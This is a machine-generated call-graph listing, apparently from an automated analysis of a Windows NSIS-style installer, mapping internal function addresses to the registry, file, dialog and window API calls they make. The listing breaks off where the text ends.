4351->4297 4352->4319 4353->4329 4355 4043f9 4354->4355 4356 406831 18 API calls 4355->4356 4357 404439 4356->4357 4358 406831 18 API calls 4357->4358 4359 404444 4358->4359 4360 406831 18 API calls 4359->4360 4361 404454 lstrlenW wsprintfW SetDlgItemTextW 4360->4361 4361->4341 4362->4345 4364 403da0 SendMessageW 4363->4364 4365 403d9b 4363->4365 4364->4347 4365->4364 4366 401dd3 4367 401446 18 API calls 4366->4367 4368 401dda 4367->4368 4369 401446 18 API calls 4368->4369 4370 4018d3 4369->4370 4371 402e55 4372 40145c 18 API calls 4371->4372 4373 402e63 4372->4373 4374 402e79 4373->4374 4375 40145c 18 API calls 4373->4375 4376 405e5c 2 API calls 4374->4376 4375->4374 4377 402e7f 4376->4377 4401 405e7c GetFileAttributesW CreateFileW 4377->4401 4379 402e8c 4380 402f35 4379->4380 4381 402e98 GlobalAlloc 4379->4381 4384 4062cf 11 API calls 4380->4384 4382 402eb1 4381->4382 4383 402f2c CloseHandle 4381->4383 4402 403368 SetFilePointer 4382->4402 4383->4380 4386 402f45 4384->4386 4388 402f50 DeleteFileW 4386->4388 4389 402f63 4386->4389 4387 402eb7 4390 403336 ReadFile 4387->4390 4388->4389 4403 401435 4389->4403 4392 402ec0 GlobalAlloc 4390->4392 4393 402ed0 4392->4393 4394 402f04 WriteFile GlobalFree 4392->4394 4396 40337f 33 API calls 4393->4396 4395 40337f 33 API calls 4394->4395 4397 402f29 4395->4397 4400 402edd 4396->4400 4397->4383 4399 402efb GlobalFree 4399->4394 4400->4399 4401->4379 4402->4387 4404 404f9e 25 API calls 4403->4404 4405 401443 4404->4405 4406 401cd5 4407 401446 18 API calls 4406->4407 4408 401cdd 4407->4408 4409 401446 18 API calls 4408->4409 4410 401ce8 4409->4410 4411 40145c 18 API calls 4410->4411 4412 401cf1 4411->4412 4413 401d07 lstrlenW 4412->4413 4414 401d43 4412->4414 4415 401d11 4413->4415 4415->4414 4419 406035 lstrcpynW 4415->4419 4417 401d2c 4417->4414 4418 401d39 lstrlenW 4417->4418 4418->4414 4419->4417 4420 402cd7 4421 401446 18 API calls 4420->4421 4423 402c64 4421->4423 4422 402d17 ReadFile 4422->4423 4423->4420 4423->4422 4424 402d99 4423->4424 4425 402dd8 4426 4030e3 4425->4426 4427 402ddf 4425->4427 4428 402de5 FindClose 4427->4428 4428->4426 4429 401d5c 4430 40145c 18 API calls 4429->4430 4431 401d63 4430->4431 4432 40145c 18 API calls 4431->4432 4433 401d6c 4432->4433 4434 401d73 lstrcmpiW 4433->4434 4435 401d86 lstrcmpW 4433->4435 4436 401d79 4434->4436 4435->4436 4437 401c99 4435->4437 4436->4435 4436->4437 4438 4027e3 4439 4027e9 4438->4439 4440 4027f2 4439->4440 4441 402836 4439->4441 4454 401553 4440->4454 4442 40145c 18 API calls 4441->4442 4444 40283d 4442->4444 4446 4062cf 11 API calls 4444->4446 4445 4027f9 4447 40145c 18 API calls 4445->4447 4451 401a13 4445->4451 4448 40284d 4446->4448 4449 40280a RegDeleteValueW 4447->4449 4458 40149d RegOpenKeyExW 4448->4458 4450 4062cf 11 API calls 4449->4450 4453 40282a RegCloseKey 4450->4453 4453->4451 4455 401563 4454->4455 4456 40145c 18 API calls 4455->4456 4457 401589 RegOpenKeyExW 4456->4457 4457->4445 4461 4014c9 4458->4461 4466 401515 4458->4466 4459 4014ef RegEnumKeyW 4460 401501 RegCloseKey 4459->4460 4459->4461 4463 406328 3 API calls 4460->4463 4461->4459 4461->4460 4462 401526 RegCloseKey 4461->4462 4464 40149d 3 API calls 4461->4464 4462->4466 4465 401511 4463->4465 4464->4461 4465->4466 4467 401541 RegDeleteKeyW 4465->4467 4466->4451 4467->4466 4468 4040e4 4469 4040ff 4468->4469 4475 40422d 4468->4475 4471 40413a 4469->4471 4499 403ff6 WideCharToMultiByte 4469->4499 4470 404298 4472 40436a 4470->4472 4473 4042a2 GetDlgItem 4470->4473 4479 403d6b 19 API calls 4471->4479 4480 403df6 8 API calls 4472->4480 4476 40432b 4473->4476 4477 4042bc 4473->4477 4475->4470 4475->4472 4478 404267 GetDlgItem SendMessageW 4475->4478 4476->4472 4481 40433d 4476->4481 4477->4476 4485 4042e2 6 API calls 4477->4485 4504 403db1 KiUserCallbackDispatcher 4478->4504 4483 40417a 4479->4483 4484 404365 4480->4484 4486 404353 4481->4486 4487 404343 SendMessageW 4481->4487 4489 403d6b 19 API calls 4483->4489 4485->4476 4486->4484 4490 404359 SendMessageW 4486->4490 4487->4486 4488 404293 4491 403d8d SendMessageW 4488->4491 4492 404187 CheckDlgButton 4489->4492 4490->4484 4491->4470 4502 403db1 KiUserCallbackDispatcher 4492->4502 4494 4041a5 GetDlgItem 4503 403dc4 SendMessageW 4494->4503 4496 4041bb SendMessageW 4497 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4496->4497 4498 4041d8 GetSysColor 4496->4498 4497->4484 4498->4497 4500 404033 4499->4500 4501 404015 GlobalAlloc WideCharToMultiByte 4499->4501 4500->4471 4501->4500 4502->4494 4503->4496 4504->4488 4505 402ae4 4506 402aeb 4505->4506 4507 4030e3 4505->4507 4508 402af2 CloseHandle 4506->4508 4508->4507 4509 402065 4510 401446 18 API calls 4509->4510 4511 40206d 4510->4511 4512 401446 18 API calls 4511->4512 4513 402076 GetDlgItem 4512->4513 4514 4030dc 4513->4514 4515 4030e3 4514->4515 4517 405f7d wsprintfW 4514->4517 4517->4515 4518 402665 4519 40145c 18 API calls 4518->4519 4520 40266b 4519->4520 4521 40145c 18 API calls 4520->4521 4522 402674 4521->4522 4523 40145c 18 API calls 4522->4523 4524 40267d 4523->4524 4525 4062cf 11 API calls 4524->4525 4526 40268c 4525->4526 4527 406301 2 API calls 4526->4527 4528 402695 4527->4528 4529 4026a6 lstrlenW lstrlenW 4528->4529 4531 404f9e 25 API calls 4528->4531 4533 4030e3 4528->4533 4530 404f9e 25 API calls 4529->4530 4532 4026e8 SHFileOperationW 4530->4532 4531->4528 4532->4528 4532->4533 4534 401c69 4535 40145c 18 API calls 4534->4535 4536 401c70 4535->4536 4537 4062cf 11 API calls 4536->4537 4538 401c80 4537->4538 4539 405ccc MessageBoxIndirectW 4538->4539 4540 401a13 4539->4540 4541 402f6e 4542 402f72 4541->4542 4543 402fae 4541->4543 4545 4062cf 11 API calls 4542->4545 4544 40145c 18 API calls 4543->4544 4551 402f9d 4544->4551 4546 402f7d 4545->4546 4547 4062cf 11 API calls 4546->4547 4548 402f90 4547->4548 4549 402fa2 4548->4549 4550 402f98 4548->4550 4553 406113 9 API calls 4549->4553 4552 403ea0 5 API calls 4550->4552 4552->4551 4553->4551 4554 4023f0 4555 402403 4554->4555 4556 4024da 4554->4556 4557 40145c 18 API calls 4555->4557 4558 404f9e 25 API calls 4556->4558 4559 40240a 4557->4559 4562 4024f1 4558->4562 4560 40145c 18 API calls 4559->4560 4561 402413 4560->4561 4563 402429 LoadLibraryExW 4561->4563 4564 40241b GetModuleHandleW 4561->4564 4565 4024ce 4563->4565 4566 40243e 4563->4566 4564->4563 4564->4566 4568 404f9e 25 API calls 4565->4568 4578 406391 GlobalAlloc WideCharToMultiByte 4566->4578 4568->4556 4569 402449 4570 40248c 4569->4570 4571 40244f 4569->4571 4572 404f9e 25 API calls 4570->4572 4573 401435 25 API calls 4571->4573 4576 40245f 4571->4576 4574 402496 4572->4574 4573->4576 4575 4062cf 11 API calls 4574->4575 4575->4576 4576->4562 4577 4024c0 FreeLibrary 4576->4577 4577->4562 4579 4063c9 GlobalFree 4578->4579 4580 4063bc GetProcAddress 4578->4580 4579->4569 4580->4579 3417 402175 3427 401446 3417->3427 3419 40217c 3420 401446 18 API calls 3419->3420 3421 402186 3420->3421 3422 402197 3421->3422 3425 4062cf 11 API calls 3421->3425 3423 4021aa EnableWindow 3422->3423 3424 40219f ShowWindow 3422->3424 3426 4030e3 3423->3426 3424->3426 3425->3422 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3419 4581 4048f8 4582 404906 4581->4582 4583 40491d 4581->4583 4584 40490c 4582->4584 4599 404986 4582->4599 4585 40492b IsWindowVisible 4583->4585 4591 404942 4583->4591 4586 403ddb SendMessageW 4584->4586 4588 404938 4585->4588 4585->4599 4589 404916 4586->4589 4587 40498c CallWindowProcW 4587->4589 4600 40487a SendMessageW 4588->4600 4591->4587 4605 406035 lstrcpynW 4591->4605 4593 404971 4606 405f7d wsprintfW 4593->4606 4595 404978 4596 40141d 80 API calls 4595->4596 4597 40497f 4596->4597 4607 406035 lstrcpynW 4597->4607 4599->4587 4601 4048d7 SendMessageW 4600->4601 4602 40489d GetMessagePos ScreenToClient SendMessageW 4600->4602 4604 4048cf 4601->4604 4603 4048d4 4602->4603 4602->4604 4603->4601 4604->4591 4605->4593 4606->4595 4607->4599 3722 4050f9 3723 4052c1 3722->3723 3724 40511a GetDlgItem GetDlgItem GetDlgItem 3722->3724 3725 4052f2 3723->3725 3726 4052ca GetDlgItem CreateThread CloseHandle 3723->3726 3771 403dc4 SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow ShowWindow 3725->3731 3726->3725 3774 405073 OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 OleUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 3780 40139d 80 API calls 3779->3780 3781 4050c1 3779->3781 3780->3779 3781->3776 4608 4020f9 GetDC GetDeviceCaps 4609 401446 18 API calls 4608->4609 4610 402116 MulDiv 4609->4610 4611 401446 18 API calls 4610->4611 4612 40212c 4611->4612 4613 406831 18 API calls 4612->4613 4614 402165 CreateFontIndirectW 4613->4614 4615 4030dc 4614->4615 4616 4030e3 4615->4616 4618 405f7d wsprintfW 4615->4618 4618->4616 4619 4024fb 4620 40145c 18 API calls 4619->4620 4621 402502 4620->4621 4622 40145c 18 API calls 4621->4622 4623 40250c 4622->4623 4624 40145c 18 API calls 4623->4624 4625 402515 4624->4625 4626 40145c 18 API calls 4625->4626 4627 40251f 4626->4627 4628 40145c 18 API calls 4627->4628 4629 402529 4628->4629 4630 40253d 4629->4630 4631 40145c 18 API calls 4629->4631 4632 4062cf 11 API calls 4630->4632 4631->4630 4633 40256a CoCreateInstance 4632->4633 4634 40258c 4633->4634 4635 4026fc 4637 402708 4635->4637 4638 401ee4 4635->4638 4636 406831 18 API calls 4636->4638 4638->4635 4638->4636 3782 4019fd 3783 40145c 18 API calls 3782->3783 3784 401a04 3783->3784 3787 405eab 3784->3787 3788 405eb8 GetTickCount GetTempFileNameW 3787->3788 3789 401a0b 3788->3789 3790 405eee 3788->3790 3790->3788 3790->3789 4639 4022fd 4640 40145c 18 API calls 4639->4640 4641 402304 GetFileVersionInfoSizeW 4640->4641 4642 4030e3 4641->4642 4643 40232b GlobalAlloc 4641->4643 4643->4642 4644 40233f GetFileVersionInfoW 4643->4644 4645 402350 VerQueryValueW 4644->4645 4646 402381 GlobalFree 4644->4646 4645->4646 4647 402369 4645->4647 4646->4642 4652 405f7d wsprintfW 4647->4652 4650 402375 4653 405f7d wsprintfW 4650->4653 4652->4650 4653->4646 4654 402afd 4655 40145c 18 API calls 4654->4655 4656 402b04 4655->4656 4661 405e7c GetFileAttributesW CreateFileW 4656->4661 4658 402b10 4659 4030e3 4658->4659 4662 405f7d wsprintfW 4658->4662 4661->4658 4662->4659 4663 4029ff 4664 401553 19 API calls 4663->4664 4665 402a09 4664->4665 4666 40145c 18 API calls 4665->4666 4667 402a12 4666->4667 4668 402a1f RegQueryValueExW 4667->4668 4672 401a13 4667->4672 4669 402a45 4668->4669 4670 402a3f 4668->4670 4671 4029e4 RegCloseKey 4669->4671 4669->4672 4670->4669 4674 405f7d wsprintfW 4670->4674 4671->4672 4674->4669 4675 401000 4676 401037 BeginPaint GetClientRect 4675->4676 4677 40100c DefWindowProcW 4675->4677 4679 4010fc 4676->4679 4680 401182 4677->4680 4681 401073 CreateBrushIndirect FillRect DeleteObject 4679->4681 4682 401105 4679->4682 4681->4679 4683 401170 EndPaint 4682->4683 4684 40110b CreateFontIndirectW 4682->4684 4683->4680 4684->4683 4685 40111b 6 API calls 4684->4685 4685->4683 4686 401f80 4687 401446 18 API calls 4686->4687 4688 401f88 4687->4688 4689 401446 18 API calls 4688->4689 4690 401f93 4689->4690 4691 401fa3 4690->4691 4692 40145c 18 API calls 4690->4692 4693 401fb3 4691->4693 4694 40145c 18 API calls 4691->4694 4692->4691 4695 402006 4693->4695 4696 401fbc 4693->4696 4694->4693 4697 40145c 18 API calls 4695->4697 4698 401446 18 API calls 4696->4698 4699 40200d 4697->4699 4700 401fc4 4698->4700 4702 40145c 18 API calls 4699->4702 4701 401446 18 API calls 4700->4701 4703 401fce 4701->4703 4704 402016 FindWindowExW 4702->4704 4705 401ff6 SendMessageW 4703->4705 4706 401fd8 SendMessageTimeoutW 4703->4706 4708 402036 4704->4708 4705->4708 4706->4708 4707 4030e3 4708->4707 4710 405f7d wsprintfW 4708->4710 4710->4707 4711 402880 4712 402884 4711->4712 4713 40145c 18 API calls 4712->4713 4714 4028a7 4713->4714 4715 40145c 18 API calls 4714->4715 4716 4028b1 4715->4716 4717 4028ba RegCreateKeyExW 4716->4717 4718 4028e8 4717->4718 4723 4029ef 4717->4723 4719 402934 4718->4719 4721 40145c 18 API calls 4718->4721 4720 402963 4719->4720 4722 401446 18 API calls 4719->4722 4724 4029ae RegSetValueExW 4720->4724 4727 40337f 33 API calls 4720->4727 4725 4028fc lstrlenW 4721->4725 4726 402947 4722->4726 4730 4029c6 RegCloseKey 4724->4730 4731 4029cb 4724->4731 4728 402918 4725->4728 4729 40292a 4725->4729 4733 4062cf 11 API calls 4726->4733 4734 40297b 4727->4734 4735 4062cf 11 API calls 4728->4735 4736 4062cf 11 API calls 4729->4736 4730->4723 4732 4062cf 11 API calls 4731->4732 4732->4730 4733->4720 4742 406250 4734->4742 4739 402922 4735->4739 4736->4719 4739->4724 4741 4062cf 11 API calls 4741->4739 4743 406273 4742->4743 4744 4062b6 4743->4744 4745 406288 wsprintfW 4743->4745 4746 402991 4744->4746 4747 4062bf lstrcatW 4744->4747 4745->4744 4745->4745 4746->4741 4747->4746 4748 403d02 4749 403d0d 4748->4749 4750 403d11 4749->4750 4751 403d14 GlobalAlloc 4749->4751 4751->4750 4752 402082 4753 401446 18 API calls 4752->4753 4754 402093 SetWindowLongW 4753->4754 4755 4030e3 4754->4755 4756 402a84 4757 401553 19 API calls 4756->4757 4758 402a8e 4757->4758 4759 401446 18 API calls 4758->4759 4760 402a98 4759->4760 4761 401a13 4760->4761 4762 402ab2 RegEnumKeyW 4760->4762 4763 402abe RegEnumValueW 4760->4763 4764 402a7e 4762->4764 4763->4761 4763->4764 4764->4761 4765 4029e4 RegCloseKey 4764->4765 4765->4761 4766 402c8a 4767 402ca2 4766->4767 4768 402c8f 4766->4768 4770 40145c 18 API calls 4767->4770 4769 401446 18 API calls 4768->4769 4772 402c97 4769->4772 4771 402ca9 lstrlenW 4770->4771 4771->4772 4773 401a13 4772->4773 4774 402ccb WriteFile 4772->4774 4774->4773 4775 401d8e 4776 40145c 18 API calls 4775->4776 4777 401d95 ExpandEnvironmentStringsW 4776->4777 4778 401da8 4777->4778 4779 401db9 4777->4779 4778->4779 4780 401dad lstrcmpW 4778->4780 4780->4779 4781 401e0f 4782 401446 18 API calls 4781->4782 4783 401e17 4782->4783 4784 401446 18 API calls 4783->4784 4785 401e21 4784->4785 4786 4030e3 4785->4786 4788 405f7d wsprintfW 4785->4788 4788->4786 4789 40438f 4790 4043c8 4789->4790 4791 40439f 4789->4791 4792 403df6 8 API calls 4790->4792 4793 403d6b 19 API calls 4791->4793 4795 4043d4 4792->4795 4794 4043ac SetDlgItemTextW 4793->4794 4794->4790 4796 403f90 4797 403fa0 4796->4797 4798 403fbc 4796->4798 4807 405cb0 GetDlgItemTextW 4797->4807 4800 403fc2 SHGetPathFromIDListW 4798->4800 4801 403fef 4798->4801 4803 403fd2 4800->4803 4806 403fd9 SendMessageW 4800->4806 4802 403fad SendMessageW 4802->4798 4804 40141d 80 API calls 4803->4804 4804->4806 4806->4801 4807->4802 4808 402392 4809 40145c 18 API calls 4808->4809 4810 402399 4809->4810 4813 407224 4810->4813 4814 406efe 25 API calls 4813->4814 4815 407244 4814->4815 4816 4023a7 4815->4816 4817 40724e lstrcpynW lstrcmpW 4815->4817 4818 407280 4817->4818 4819 407286 lstrcpynW 4817->4819 4818->4819 4819->4816 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4820 402797 4821 40145c 18 API calls 4820->4821 4822 4027ae 4821->4822 4823 40145c 18 API calls 4822->4823 4824 4027b7 4823->4824 4825 40145c 18 API calls 4824->4825 4826 4027c0 GetPrivateProfileStringW lstrcmpW 4825->4826 4827 401e9a 4828 40145c 18 API calls 4827->4828 4829 401ea1 4828->4829 4830 401446 18 API calls 4829->4830 4831 401eab wsprintfW 4830->4831 3791 401a1f 3792 40145c 18 API calls 3791->3792 3793 401a26 3792->3793 3794 4062cf 11 API calls 3793->3794 3795 401a49 3794->3795 3796 401a64 3795->3796 3797 401a5c 3795->3797 3866 406035 lstrcpynW 3796->3866 3865 406035 lstrcpynW 3797->3865 3800 401a6f 3867 40674e lstrlenW CharPrevW 3800->3867 3801 401a62 3804 406064 5 API calls 3801->3804 3835 401a81 3804->3835 3805 406301 2 API calls 3805->3835 3808 401a98 CompareFileTime 3808->3835 3809 401ba9 3810 404f9e 25 API calls 3809->3810 3812 401bb3 3810->3812 3811 401b5d 3813 404f9e 25 API calls 3811->3813 3844 40337f 3812->3844 3815 401b70 3813->3815 3819 4062cf 11 API calls 3815->3819 3817 406035 lstrcpynW 3817->3835 3818 4062cf 11 API calls 3820 401bda 3818->3820 3824 401b8b 3819->3824 3821 401be9 SetFileTime 3820->3821 3822 401bf8 CloseHandle 3820->3822 3821->3822 3822->3824 3825 401c09 3822->3825 3823 406831 18 API calls 3823->3835 3826 401c21 3825->3826 3827 401c0e 3825->3827 3828 406831 18 API calls 3826->3828 3829 406831 18 API calls 3827->3829 3830 401c29 3828->3830 3832 401c16 lstrcatW 3829->3832 3833 4062cf 11 API calls 3830->3833 3832->3830 3836 401c34 3833->3836 3834 401b50 3838 401b93 3834->3838 3839 401b53 3834->3839 3835->3805 3835->3808 3835->3809 3835->3811 3835->3817 3835->3823 3835->3834 3837 4062cf 11 API calls 3835->3837 3843 405e7c GetFileAttributesW CreateFileW 3835->3843 3870 405e5c GetFileAttributesW 3835->3870 3873 405ccc 3835->3873 3840 405ccc MessageBoxIndirectW 3836->3840 3837->3835 3841 4062cf 11 API calls 3838->3841 3842 4062cf 11 API calls 3839->3842 3840->3824 3841->3824 3842->3811 3843->3835 3845 40339a 3844->3845 3846 4033c7 3845->3846 3879 403368 SetFilePointer 3845->3879 3877 403336 ReadFile 3846->3877 3850 401bc6 3850->3818 3851 403546 3853 40354a 3851->3853 3854 40356e 3851->3854 3852 4033eb GetTickCount 3852->3850 3857 403438 3852->3857 3855 403336 ReadFile 3853->3855 3854->3850 3858 403336 ReadFile 3854->3858 3859 40358d WriteFile 3854->3859 3855->3850 3856 403336 ReadFile 3856->3857 3857->3850 3857->3856 3861 40348a GetTickCount 3857->3861 3862 4034af MulDiv wsprintfW 3857->3862 3864 4034f3 WriteFile 3857->3864 3858->3854 3859->3850 3860 4035a1 3859->3860 3860->3850 3860->3854 3861->3857 3863 404f9e 25 API calls 3862->3863 3863->3857 3864->3850 3864->3857 3865->3801 3866->3800 3868 401a75 lstrcatW 3867->3868 3869 40676b lstrcatW 3867->3869 3868->3801 3869->3868 3871 405e79 3870->3871 3872 405e6b SetFileAttributesW 3870->3872 3871->3835 3872->3871 3874 405ce1 3873->3874 3875 405d2f 3874->3875 3876 405cf7 MessageBoxIndirectW 3874->3876 3875->3835 3876->3875 3878 403357 3877->3878 3878->3850 3878->3851 3878->3852 3879->3846 4832 40209f GetDlgItem GetClientRect 4833 40145c 18 API calls 4832->4833 4834 4020cf LoadImageW SendMessageW 4833->4834 4835 4030e3 4834->4835 4836 4020ed DeleteObject 4834->4836 4836->4835 4837 402b9f 4838 401446 18 API calls 4837->4838 4842 402ba7 4838->4842 4839 402c4a 4840 402bdf ReadFile 4840->4842 4849 402c3d 4840->4849 4841 401446 18 API calls 4841->4849 4842->4839 4842->4840 4843 402c06 MultiByteToWideChar 4842->4843 4844 402c3f 4842->4844 4845 402c4f 4842->4845 4842->4849 4843->4842 4843->4845 4850 405f7d wsprintfW 4844->4850 4847 402c6b SetFilePointer 4845->4847 4845->4849 4847->4849 4848 402d17 ReadFile 4848->4849 4849->4839 4849->4841 4849->4848 4850->4839 4851 402b23 GlobalAlloc 4852 402b39 4851->4852 4853 402b4b 4851->4853 4854 401446 18 API calls 4852->4854 4855 40145c 18 API calls 4853->4855 4857 402b41 4854->4857 4856 402b52 WideCharToMultiByte lstrlenA 4855->4856 4856->4857 4858 402b84 WriteFile 4857->4858 4859 402b93 4857->4859 4858->4859 4860 402384 GlobalFree 4858->4860 4860->4859 4862 4040a3 4863 4040b0 lstrcpynW lstrlenW 4862->4863 4864 4040ad 4862->4864 4864->4863 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a KiUserCallbackDispatcher KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 